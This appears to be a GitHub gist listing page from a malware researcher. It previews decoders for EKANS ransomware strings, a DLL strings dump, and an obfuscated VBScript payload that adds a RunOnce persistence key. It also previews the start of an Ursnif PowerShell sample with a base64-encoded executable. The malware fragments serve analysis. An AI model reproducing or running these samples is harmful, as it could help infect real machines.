Tweaked script:
import re
import sys
import pefile
import struct
import binascii
W3ndige
/ d4da69e424241c291c173c8b3756639c654432706e7def5025a649730868c4a1-decoded-strings.md
Created
June 8, 2020 21:05
W3ndige
/ e69f3cccaa61de4390363b5987daecea-strings.txt
Created
May 27, 2020 19:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ strings -e l faxprint.dll | |
| GGMM | |
| exit | |
| %s%s\ | |
| Kernel32.dll | |
| May 9 2020 | |
| %d*%d | |
| %dd%dh%dm%ds | |
| T:%dM,A:%dM | |
| ~MHz |
W3ndige
/ 2ed3e37608e65be8b6e8c59f8c93240bd0efe9a60c08c21f4889c00eb6082d74-decoded-strings.md
Created
May 7, 2020 08:51
Strings decoded from the newer version of #EKANS ransomware.
import re
import sys
import pefile
import struct
import binascii
W3ndige
/ 8b33cc03f7b0632a4ec9ad95c30c0622-payload.md
Created
March 2, 2020 20:20
On Error Resume Next
Set bhBxz = WScript.CreateObject("WScript.Shell")
NgWJtK = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\MediaPlayer"
Set VFUSKXwNgG = CreateObject("WScript.Shell")
Set ioBuA = CreateObject("Scripting.FileSystemObject")
ARtLeH = VFUSKXwNgG.ExpandEnvironmentStrings("%USERPROFILE%")
GOfuTtmrFM=VFUSKXwNgG.ExpandEnvironmentStrings("%COMPUTERNAME%")
tAqdq=VFUSKXwNgG.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
IVcetC=VFUSKXwNgG.ExpandEnvironmentStrings("%APPDATA%")
W3ndige
/ e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60-decoded-strings.md
Last active
November 8, 2020 15:23
Script and the decoded strings from the EKANS/Snake ransomware. Original script written by @sysopfb - I've only modified the regexp to cover all cases where decryption was used in the sample.
Script:
import re
import sys
import pefile
import struct
W3ndige
/ keybase.md
Created
November 15, 2019 20:00
I hereby claim:
- I am W3ndige on github.
- I am w3ndige (https://keybase.io/w3ndige) on keybase.
- I have a public key whose fingerprint is 2B28 A0A2 94AE FE39 F809 6580 6221 363F F83A B8FB
To claim this, I am signing this object:
W3ndige
/ 2019-10-16-ursnif-powershell
Created
October 17, 2019 18:04
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $filebase64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABmnvOBIv+d0iL/ndIi/53SBTnz0j7/ndIFOeDSNP+d0gU58NJ3/53S4fDA0i3/ndIi/5zSVv+d0gU579Ij/53SBTnn0iP/ndIFOeHSI/+d0gU55dIj/53SUmljaCL/ndIAAAAAAAAAAFBFAABMAQUAxUSkXQAAAAAAAAAA4AACIQsBCAAAgAoAAIADAAAAAACXGQAAABAAAACQCgAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAACfAAAQAAD5QQ4AAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAADYDABHAAAA/M0MAKAAAAAAgJ4AOAMAAAAAAAAAAAAAAAAAAAAAAAAAkJ4AHAsAAOCRCgAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQCgCsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAADWcwoAABAAAACACgAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAR0gCAACQCgAAUAIAAJAKAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAABiWkQAA4AwAALAAAADgDAAAAAAAAAAAAAAAAABAAADALnJzcmMAAAA4AwAAAICeAAAQAAAAkA0AAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAfGIAAACQngAAcAAAAKANAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |